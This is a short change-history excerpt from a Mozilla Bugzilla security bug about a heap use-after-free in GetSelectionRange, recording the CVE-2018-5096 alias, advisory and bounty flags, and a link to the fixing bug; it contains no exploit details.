||
Updated•6 years ago
|
Group: dom-core-security → core-security-release
|
||
Updated•6 years ago
|
Whiteboard: [adv-esr52.6+]
|
||
Updated•6 years ago
|
Summary: heap-use-after-free in GetSelectionRange {waiting approval} → heap-use-after-free in GetSelectionRange
|
|
||
Updated•6 years ago
|
Alias: CVE-2018-5096
|
|
||
Updated•6 years ago
|
Flags: sec-bounty?
|
|
||
Updated•6 years ago
|
See Also: → 1343037
Whiteboard: [adv-esr52.6+] → [adv-esr52.6+][fixed on trunk in bug 1343037]
|
|
||
Updated•6 years ago
|
Flags: sec-bounty? → sec-bounty+
|
|
||
Updated•6 years ago
|
Group: core-security-release
You need to log in
before you can comment on or make changes to this bug.
Description
•